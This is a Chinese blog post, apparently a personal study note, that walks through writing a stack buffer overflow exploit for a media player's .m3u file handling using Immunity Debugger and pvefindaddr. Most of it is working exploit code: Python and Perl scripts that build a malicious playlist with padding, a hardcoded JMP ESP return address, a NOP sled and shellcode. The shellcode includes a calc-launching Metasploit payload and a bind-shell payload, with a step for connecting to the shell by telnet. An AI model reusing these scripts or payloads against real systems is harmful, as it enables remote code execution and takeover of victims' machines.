• ImmunityDebugger 学习


     Immunity  Debugger软件专门用于加速漏洞利用程序的开发,辅助漏洞挖掘以
    及恶意软件分析。它具备一个完整的图形用户界面,同时还配备了迄今为止最为
    强的python安全工具库。它巧妙的将动态调试功能与一个强大的静态分析引擎融
    合于一体,它还附带了一套高度可定制的纯python图形算法,可用于帮助我们绘
    制出直观的函数体控制流以及函数中的各个基本块。



    另外   windbg -I   (大写I可以设置即时调试器)

    只是学习记录,别无他意·············各种转载请见谅·······················

    学习安装:  http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_install

    用法:   http://redmine.corelan.be:8800/projects/pvefindaddr/wiki/Pvefindaddr_usage


    下载   pvefindaddr.py   放入   Immunity Debugger v1.8.3PyCommands 目录下   在命令行中即可使用


    下面以一个实例来学习怎么用·························

    pvefindaddr pattern_create 6000  

    等下你就可以看到提示"check mspttern.txt",到Immunity Debugger 目录下打开mspatters.txt 中的 字串,拷贝模板到我们的漏洞利用代码中并重新生成,然后加载到immunitydebugger中运行包含模板的恶意文档。


    pvefindaddr findmsp 自动化分析,各种分析,如果可以就可以得到出错的地址和覆盖到的SEH

    官方:  
    此功能将尝试找到一个所谓的循环模式(又名Metasploit的图案)在存储器中的开始,并且也将尝试找到的偏移量的循环模式,由寄存器参考的,偏移到一个寄存器中,或在堆栈。
    除了 ​​这个,findmsp也将尝试猜测偏移到A的长字符串的开头。
    不需要参数,所有的输出写入到日志窗口。

    可以看到链异常和异常地址

    当然也可以用 windbg 加载    当然也会看到出现 异常,查看异常:


    都会看到   异常链地址   47356f47 

    接着我们查看  是多少个字节造成的:


    pattern_offset。功能将尝试找到在一个循环模式4字节给出的确切位置
    这个函数需要一个参数:4个字节来定位。这4个字节可以是4个字符或4个字节。在这两种情况下,没有空格应的字符或字节之间插入。
    即使已颠倒的4个字节的顺序,则程序将仍然能够定位的精确位置上,从环状图案的开头开始。
    
    语法:pattern_offset <4字节>
    
    输出被写入只日志窗口。
    看到是   5115 为  异常的链地址


    接着  就有指令可以自动给出解决方法:



    DEP参考 : http://blog.csdn.net/zcc1414/article/details/11709405

    本文学习参考 :  

    http://bbs.pediy.com/showthread.php?t=130748&highlight=pvefindaddr

    下面用 exploits 编写系列之一 来学习
    首先  这个程序 如果直接用  !pvefindaddr pattern_create xxxxx  去创建一个测试文件的话会不成功的!!!!!
    因为程序可能有检查什么的什么的·········································比如 过滤文件名和路径中不被允许的字符 直接弹框而不是直接崩溃

    Python脚本:  
    PS:  看来PYTHON脚本很有用啊,加快学习啊!!!
    1  首先测试  'x41'个数,它不会直接弹框,可以看到EIP被赋值为 x41
    大概弄个数去测试再加上 !pvefindaddr pattern_create 生成的字符串 就可以去测试多少  (注意不能直接上检测字符串  因为程序有检查  以后注意)
    junk = 'x41'*26000
    junk2 = ('Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B')
    exploit = junk+junk2
    
    try:
      file=open('C:\Users\Administrator\Desktop\exploits.m3u','w')
      file.write(exploit)
      file.close()
      print 'File created, time to PEW PEW!
    '
    except:
      print 'Something went wrong!
    '
      print 'Check if you have permisions to write in that folder, of if the folder exists!'




    可以看到ESP 上有我们的检测字符串    所以就可以  自动化检测室多少字节搞的EIP    
    那么  pattern_offset 指定的参数为  我们输入的检测字符串  发现时第75个造成的


    接着来:

      #!/usr/bin/python
    
    junk = 'x41'*(26075)
    eip = 'x11'*4
    nop = 'x90'*20
    prejunk = 'x42'*700
    
    
    exploit = junk+eip+nop+prejunk
    
    try:
      file=open('C:\Users\Administrator\Desktop\exploits.m3u','w')
      file.write(exploit)
      file.close()
      print 'File created, time to PEW PEW!
    '
    except:
      print 'Something went wrong!
    '
      print 'Check if you have permisions to write in that folder, of if the folder exists!'


    不出所料,EIP被赋值为了x11 * 4 了
    但是后面还是又有问题!!!
    因为EIP后面的 x90 没有我们指定的20个  那么其中猜测被NOP掉了几个



    现在才来构造shellcode:


    发现程序在WINDBG中搜到的 JMP ESP 和OD 中的地址不一致,程序有重定位DLL

      #!/usr/bin/python
    
    junk = 'x41'*(26075)
    jmpesp = 'xd7x93xd3x7d'
    #7DD393D7
    
    nop = 'x90'*25
    shellcode = ('xD9xEE'         
    'xD9x74x24xF4'   
    'x58'              
    'x83xC0x1b'   
    'x33xC9'        
    'x8Ax1Cx08'     
    'x80xF3x11'		
    'x88x1Cx08'    
    'x41'           
    'x80xFBx90' 
    'x75xF1'
    'xedx79x7bx1bx29x0fx79x72x98xc0x5ex79x23x65x80x1d'
    'x9axe5x9cx6fxe5x22xcaxa6x15x3axf2x77xaax22x23x42'
    'x79x64x62x74x63x45x22xc3x75x9ax4bx21x9ax5ax1dx9a'
    'x58x0dx9ax18x9ax78x19xbcx2cx7bx1bx29x0fx64x14x84'
    'xeex46xe9x84x71x9ax54x2dx9ax5dx14x69x12xdcx9ax48'
    'x31x12xccx22xeex56x9ax25xaax12xe4x88x1exafx17x2b'
    'xd5x65x19xd0xdbx16x12xc1x57xfaxe0x2ax45x35x0dx64'
    'xf5x9ax48x35x12xccx77x9ax2dx6ax9ax48x0dx12xccx12'
    'x3dxaax84x4exbax46x70x2cx7bx1bx29x0fx64xb8x22xca'
    'x42x79x75x70x21x32x79x32x41x70x7fx9axd5x42x41x41'
    'x42xeex46xedx42xeex46xe9x81')
    
    
    exploit = junk+jmpesp+nop+shellcode
    
    try:
      file=open('C:\Users\Administrator\Desktop\exploits.m3u','w')
      file.write(exploit)
      file.close()
      print 'File created, time to PEW PEW!
    '
    except:
      print 'Something went wrong!
    '
      print 'Check if you have permisions to write in that folder, of if the folder exists!'

    最后成功:




    再学习下 Perl脚本:
    # windows/exec - 223 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # EXITFUNC=process, CMD=calc
    my $file = "test.m3u";
    my $junk = "x41"x 26075;#7DD393D7
    my $jmpesp = pack('V',0x7DD393D7);
    my $nop = "x90"x 25;
    my $buf = 
    "xbax9dxaex2fx1cxdbxc5x31xc9xd9x74x24xf4x5b" .
    "xb1x32x31x53x12x83xc3x04x03xcexa0xcdxe9x0c" .
    "x54x98x12xecxa5xfbx9bx09x94x29xffx5ax85xfd" .
    "x8bx0ex26x75xd9xbaxbdxfbxf6xcdx76xb1x20xe0" .
    "x87x77xedxaex44x19x91xacx98xf9xa8x7fxedxf8" .
    "xedx9dx1exa8xa6xeax8dx5dxc2xaex0dx5fx04xa5" .
    "x2ex27x21x79xdax9dx28xa9x73xa9x63x51xffxf5" .
    "x53x60x2cxe6xa8x2bx59xddx5bxaax8bx2fxa3x9d" .
    "xf3xfcx9ax12xfexfdxdbx94xe1x8bx17xe7x9cx8b" .
    "xe3x9ax7ax19xf6x3cx08xb9xd2xbdxddx5cx90xb1" .
    "xaax2bxfexd5x2dxffx74xe1xa6xfex5ax60xfcx24" .
    "x7fx29xa6x45x26x97x09x79x38x7fxf5xdfx32x6d" .
    "xe2x66x19xfbxf5xebx27x42xf5xf3x27xe4x9exc2" .
    "xacx6bxd8xdax66xc8x16x91x2bx78xbfx7cxbex39" .
    "xa2x7ex14x7dxdbxfcx9dxfdx18x1cxd4xf8x65x9a" .
    "x04x70xf5x4fx2bx27xf6x45x48xa6x64x05x8f";
    
    open($FILE,">$file");
    print $FILE $junk.$jmpesp.$nop.$buf;
    close($FILE);
    

    反弹shell

    攻击者再在 CMD中  telnet 被攻击者IP  端口号
    得到shell
    # windows/exec - 223 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # EXITFUNC=process, CMD=calc
    my $file = "test.m3u";
    my $junk = "x41"x 26075;#7DD393D7
    my $jmpesp = pack('V',0x7DD393D7);
    my $nop = "x90"x 25;
    
    # windows/shell_bind_tcp - 368 bytes
    # http://www.metasploit.com
    # Encoder: x86/shikata_ga_nai
    # LPORT=4444, RHOST=192.168.198.1, EXITFUNC=process, 
    # InitialAutoRunScript=, AutoRunScript=
    my $buf = 
    "x31xc9xb1x56xb8x28x2dx92x06xd9xcbxd9x74x24" .
    "xf4x5ax31x42x0fx03x42x0fx83xc2x2cxcfx67xfa" .
    "xc4x86x88x03x14xf9x01xe6x25x2bx75x62x17xfb" .
    "xfdx26x9bx70x53xd3x28xf4x7cxd4x99xb3x5axdb" .
    "x1ax72x63xb7xd8x14x1fxcax0cxf7x1ex05x41xf6" .
    "x67x78xa9xaax30xf6x1bx5bx34x4axa7x5ax9axc0" .
    "x97x24x9fx17x63x9fx9ex47xdbx94xe9x7fx50xf2" .
    "xc9x7exb5xe0x36xc8xb2xd3xcdxcbx12x2ax2dxfa" .
    "x5axe1x10x32x57xfbx55xf5x87x8exadx05x3ax89" .
    "x75x77xe0x1cx68xdfx63x86x48xe1xa0x51x1axed" .
    "x0dx15x44xf2x90xfaxfex0ex19xfdxd0x86x59xda" .
    "xf4xc3x3ax43xacxa9xedx7cxaex16x52xd9xa4xb5" .
    "x87x5bxe7xd1x64x56x18x22xe2xe1x6bx10xadx59" .
    "xe4x18x26x44xf3x5fx1dx30x6bx9ex9dx41xa5x65" .
    "xc9x11xddx4cx71xfax1dx70xa4xadx4dxdex16x0e" .
    "x3ex9exc6xe6x54x11x39x16x57xfbx4cx10x99xdf" .
    "x1dxf7xd8xdfxb0x5bx54x39xd8x73x30x91x74xb6" .
    "x67x2axe3xc9x4dx06xbcx5dxd9x40x7ax61xdax46" .
    "x29xcex72x01xb9x1cx47x30xbex08xefx3bx87xdb" .
    "x65x52x4ax7dx79x7fx3cx1exe8xe4xbcx69x11xb3" .
    "xebx3exe7xcax79xd3x5ex65x9fx2ex06x4ex1bxf5" .
    "xfbx51xa2x78x47x76xb4x44x48x32xe0x18x1fxec" .
    "x5exdfxc9x5ex08x89xa6x08xdcx4cx85x8ax9ax50" .
    "xc0x7cx42xe0xbdx38x7dxcdx29xcdx06x33xcax32" .
    "xddxf7xfax78x7fx51x93x24xeaxe3xfexd6xc1x20" .
    "x07x55xe3xd8xfcx45x86xddxb9xc1x7bxacxd2xa7" .
    "x7bx03xd2xed";
    
    open($FILE,">$file");
    print $FILE $junk.$jmpesp.$nop.$buf;
    close($FILE);























  • 相关阅读:
    android 自定义日历控件
    android 常用类
    真假空格风波
    设计模式的初衷---“委托”有感
    pymysql.err.InterfaceError: (0, '')
    微信文章收藏到有道云笔记PC版只保留了标题
    SQL Server数据库字典生成SQL
    nhibernate常见错误
    NUnit
    使用ffmpeg截取视频
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982393.html
Copyright © 2020-2023  润新知